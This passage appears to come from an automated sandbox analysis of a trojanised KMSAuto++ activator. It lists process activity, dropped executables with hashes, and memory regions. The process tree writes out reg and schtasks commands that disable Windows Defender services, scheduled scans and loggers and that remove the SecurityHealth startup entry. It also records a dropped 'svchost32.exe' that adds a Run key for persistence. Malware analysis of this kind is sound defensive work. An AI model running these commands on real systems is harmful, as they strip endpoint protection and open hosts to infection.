          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      [4] C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      [4] C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      [4] C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      [4] C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      [4] C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      [4] C:\Windows\system32\reg.exe
          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
      [4] C:\Windows\system32\reg.exe
          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
      [4] C:\Windows\system32\reg.exe
          reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      [4] C:\Windows\system32\reg.exe
          reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      [4] C:\Windows\system32\reg.exe
          reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
          - Modifies security service
  [2] C:\Users\Admin\svchost32.exe
      "C:\Users\Admin\svchost32.exe"
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious behavior: AddClipboardFormatListener
[1] C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe
    "C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 KillProcessOnPort -Log -IP
    - Executes dropped EXE
[1] C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe
    "C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 KillProcessOnPort -Log -IP
    - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\3EF5.tmp\3F05.tmp\3F16.bat
  Filesize 3KB
  MD5 3a981c51aac5475414f6dea9f4e6ae1a
  SHA1 90fb6d188c3a6a04f9294fabc71f62635f0c3ea6
  SHA256 f6498b247cc03e1599bb19fc49dabb923b675bdfb0fd2348f78861842624f809
  SHA512 a8b49ee8606681f5559d3edddf1708df86f33b9029f140030037d4d2dff40bd288e0c69096be0ead4da4019c0ca5efcf81a33c7405bc82040fe833bb473f0e0b
- C:\Users\Admin\AppData\Local\Temp\signtool.exe
  Filesize 323KB
  MD5 05624e6d27eaef0db0673ae627bd6027
  SHA1 b155c76bf59992a8d75d0e3a59dc94f24aff2591
  SHA256 962a92821f54a1e706aa989973130fdc1072c7bd8b9e6d11ea1050b46eb9d313
  SHA512 233304669aefeec9ad5d19bd2dd5bb19ea35ce31da0b3aabe5ab859259608a58725fac5993637c9635e5912138d3eb477773351f0ee81cc3ce756d713163cf31
- C:\Users\Admin\AppData\Local\Temp\slmgr.vbs
  Filesize 110KB
  MD5 38482a5013d8ab40df0fb15eae022c57
  SHA1 5a4a7f261307721656c11b5cc097cde1cf791073
  SHA256 ac5c46b97345465a96e9ae1edaff44b191a39bf3d03dc1128090b8ffa92a16f8
  SHA512 29c1348014ac448fb9c1a72bfd0ab16cdd62b628dc64827b02965b96ba851e9265c4426007181d2aa08f8fb7853142cc01fc6e4d89bec8fc25f3d340d3857331
- C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe
  Filesize 33KB
  MD5 757a99654e7709aa3ef33056fc3dc8eb
  SHA1 d63430b034d1587793dcb5d738b8c3f612546118
  SHA256 ed1aaeb33ea7f8bc4d7fec92dd592eed6192830764e89c3aafa08c075a176817
  SHA512 517cbfd2f07d104ca4a2d38ee320f9bf961f3ea46cf5c3fdee5e6e20cc0e45ef4bf7119580febdd841b835144ae2701eeca8b5398daab8593a4a1b57535e1f04
- C:\Users\Admin\KMSAuto_Files\bin\KMSSS.log
  Filesize 773B
  MD5 8535c4bbb7167c46ba65262945fe5c28
  SHA1 311e55ffeaae1317c4cd83c9000f65082ae32c2d
  SHA256 fbcbb6f17371066eb9b44303070cc0b1b2100b77195d1c6baebdd15a47691fda
  SHA512 0285b927ad48960ef9581a3216475cdcef7d5df9807f294a247fc8dc75ee02c34ae927ddc02112befed9f22a75b3604b8ce416240b8d1e1f58d5b949b4299034
- C:\Users\Admin\kms driver.exe
  Filesize 46KB
  MD5 5f3f77593b1a5bc4e96257a38a8666b1
  SHA1 532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0
  SHA256 1b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17
  SHA512 59b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200
- C:\Users\Admin\kmsauto++v1.6.4.exe
  Filesize 17.2MB
  MD5 f047284bfddc942292d93ed86fdb20fd
  SHA1 56dc945674cf4f941cf17a9ac9c1c9718cf9d18e
  SHA256 793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46
  SHA512 2ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513
- C:\Users\Admin\microsoft tap driver.exe
  Filesize 59KB
  MD5 e0b6a8a56069214d6dc31a2c053f73f7
  SHA1 3eb13ab2e49014437c904f8ada2d22a85fd503e4
  SHA256 4318860735858dab331f918367caf179c21dcae917df8119609d2edf58eaa5f9
  SHA512 080409c159559060b898978b36378c848f882e6c033bb0fb8307478ebd346b418aea653627f456f523fd57626b0ce0b26e0fe323541a790c1fc96a33b9e2ed68
- C:\Users\Admin\svchost32.exe
  Filesize 533KB
  MD5 4ec113ac1f8e7d4dda1270cc8bb00efc
  SHA1 7a33598cab86959e8a3001ef0a2a756514de3aed
  SHA256 7f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad
  SHA512 28954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2
- \Users\Admin\AppData\Local\Temp\signtool.exe
  Filesize 323KB
  MD5 05624e6d27eaef0db0673ae627bd6027
  SHA1 b155c76bf59992a8d75d0e3a59dc94f24aff2591
  SHA256 962a92821f54a1e706aa989973130fdc1072c7bd8b9e6d11ea1050b46eb9d313
  SHA512 233304669aefeec9ad5d19bd2dd5bb19ea35ce31da0b3aabe5ab859259608a58725fac5993637c9635e5912138d3eb477773351f0ee81cc3ce756d713163cf31
- \Users\Admin\kms driver.exe
  Filesize 46KB
  MD5 5f3f77593b1a5bc4e96257a38a8666b1
  SHA1 532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0
  SHA256 1b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17
  SHA512 59b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200
- \Users\Admin\kmsauto++v1.6.4.exe
  Filesize 17.2MB
  MD5 f047284bfddc942292d93ed86fdb20fd
  SHA1 56dc945674cf4f941cf17a9ac9c1c9718cf9d18e
  SHA256 793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46
  SHA512 2ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513
- \Users\Admin\microsoft tap driver.exe
  Filesize 59KB
  MD5 e0b6a8a56069214d6dc31a2c053f73f7
  SHA1 3eb13ab2e49014437c904f8ada2d22a85fd503e4
  SHA256 4318860735858dab331f918367caf179c21dcae917df8119609d2edf58eaa5f9
  SHA512 080409c159559060b898978b36378c848f882e6c033bb0fb8307478ebd346b418aea653627f456f523fd57626b0ce0b26e0fe323541a790c1fc96a33b9e2ed68
- \Users\Admin\svchost32.exe
  Filesize 533KB
  MD5 4ec113ac1f8e7d4dda1270cc8bb00efc
  SHA1 7a33598cab86959e8a3001ef0a2a756514de3aed
  SHA256 7f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad
  SHA512 28954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2
-
memory/296-131-0x0000000000000000-mapping.dmp
-
memory/316-115-0x0000000000000000-mapping.dmp
-
memory/396-118-0x0000000000000000-mapping.dmp
-
memory/480-109-0x0000000000000000-mapping.dmp
-
memory/520-66-0x0000000000000000-mapping.dmp
- memory/520-90-0x0000000000400000-0x0000000001713000-memory.dmp
  Filesize 19.1MB
- memory/520-132-0x0000000073DC1000-0x0000000073DC3000-memory.dmp
  Filesize 8KB
- memory/520-134-0x0000000000400000-0x0000000001713000-memory.dmp
  Filesize 19.1MB
-
memory/544-111-0x0000000000000000-mapping.dmp
-
memory/636-165-0x0000000000000000-mapping.dmp
-
memory/652-145-0x0000000000000000-mapping.dmp
-
memory/776-161-0x0000000000000000-mapping.dmp
-
memory/844-142-0x0000000000000000-mapping.dmp
-
memory/892-129-0x0000000000000000-mapping.dmp
-
memory/896-148-0x0000000000000000-mapping.dmp
-
memory/928-125-0x0000000000000000-mapping.dmp
-
memory/928-95-0x0000000000000000-mapping.dmp
-
memory/928-141-0x0000000000000000-mapping.dmp
-
memory/956-121-0x0000000000000000-mapping.dmp
-
memory/972-112-0x0000000000000000-mapping.dmp
-
memory/980-124-0x0000000000000000-mapping.dmp
-
memory/984-157-0x0000000000000000-mapping.dmp
-
memory/1000-122-0x0000000000000000-mapping.dmp
-
memory/1020-99-0x0000000000000000-mapping.dmp
-
memory/1020-128-0x0000000000000000-mapping.dmp
-
memory/1048-151-0x0000000000000000-mapping.dmp
-
memory/1144-98-0x0000000000000000-mapping.dmp
-
memory/1156-103-0x0000000000000000-mapping.dmp
-
memory/1156-144-0x0000000000000000-mapping.dmp
-
memory/1184-162-0x0000000000000000-mapping.dmp
-
memory/1256-167-0x0000000000000000-mapping.dmp
-
memory/1276-150-0x0000000000000000-mapping.dmp
-
memory/1276-110-0x0000000000000000-mapping.dmp
-
memory/1284-130-0x0000000000000000-mapping.dmp
-
memory/1316-160-0x0000000000000000-mapping.dmp
-
memory/1380-153-0x0000000000000000-mapping.dmp
-
memory/1416-133-0x0000000000000000-mapping.dmp
-
memory/1416-108-0x0000000000000000-mapping.dmp
-
memory/1428-100-0x0000000000000000-mapping.dmp
-
memory/1516-114-0x0000000000000000-mapping.dmp
-
memory/1516-147-0x0000000000000000-mapping.dmp
-
memory/1532-137-0x0000000000000000-mapping.dmp
-
memory/1592-152-0x0000000000000000-mapping.dmp
-
memory/1596-74-0x0000000000000000-mapping.dmp
-
memory/1596-166-0x0000000000000000-mapping.dmp
- memory/1596-93-0x0000000000400000-0x000000000041F000-memory.dmp
  Filesize 124KB
-
memory/1632-156-0x0000000000000000-mapping.dmp
-
memory/1636-120-0x0000000000000000-mapping.dmp
-
memory/1652-158-0x0000000000000000-mapping.dmp
-
memory/1652-106-0x0000000000000000-mapping.dmp
-
memory/1736-80-0x0000000000000000-mapping.dmp
-
memory/1744-159-0x0000000000000000-mapping.dmp
-
memory/1760-123-0x0000000000000000-mapping.dmp
-
memory/1808-136-0x0000000000000000-mapping.dmp
-
memory/1808-116-0x0000000000000000-mapping.dmp
- memory/1816-91-0x0000000000890000-0x00000000008FD000-memory.dmp
  Filesize 436KB
- memory/1816-89-0x0000000000268000-0x00000000002CC000-memory.dmp
  Filesize 400KB
-
memory/1816-86-0x0000000000000000-mapping.dmp
- memory/1816-92-0x0000000000400000-0x0000000000886000-memory.dmp
  Filesize 4.5MB
- memory/1816-101-0x0000000000268000-0x00000000002CC000-memory.dmp
  Filesize 400KB
- memory/1816-135-0x0000000000400000-0x0000000000886000-memory.dmp
  Filesize 4.5MB
-
memory/1880-59-0x0000000000000000-mapping.dmp
- memory/1880-88-0x0000000000DC0000-0x0000000000DCE000-memory.dmp
  Filesize 56KB
-
memory/1888-119-0x0000000000000000-mapping.dmp
-
memory/1896-164-0x0000000000000000-mapping.dmp
-
memory/1896-126-0x0000000000000000-mapping.dmp
-
memory/1908-138-0x0000000000000000-mapping.dmp
- memory/1916-140-0x000007FEFB981000-0x000007FEFB983000-memory.dmp
  Filesize 8KB
-
memory/1916-139-0x0000000000000000-mapping.dmp
-
memory/1924-102-0x0000000000000000-mapping.dmp
-
memory/1972-117-0x0000000000000000-mapping.dmp
-
memory/1976-96-0x0000000000000000-mapping.dmp
-
memory/1976-163-0x0000000000000000-mapping.dmp
-
memory/1976-127-0x0000000000000000-mapping.dmp
- memory/1984-78-0x0000000004240000-0x000000000425F000-memory.dmp
  Filesize 124KB
- memory/1984-76-0x0000000004210000-0x000000000422F000-memory.dmp
  Filesize 124KB
- memory/1984-75-0x0000000005870000-0x0000000006B83000-memory.dmp
  Filesize 19.1MB
- memory/1984-71-0x0000000005870000-0x0000000006B83000-memory.dmp
  Filesize 19.1MB
- memory/1984-69-0x0000000005870000-0x0000000006B83000-memory.dmp
  Filesize 19.1MB
- memory/1984-54-0x0000000075691000-0x0000000075693000-memory.dmp
  Filesize 8KB
-
memory/2040-113-0x0000000000000000-mapping.dmp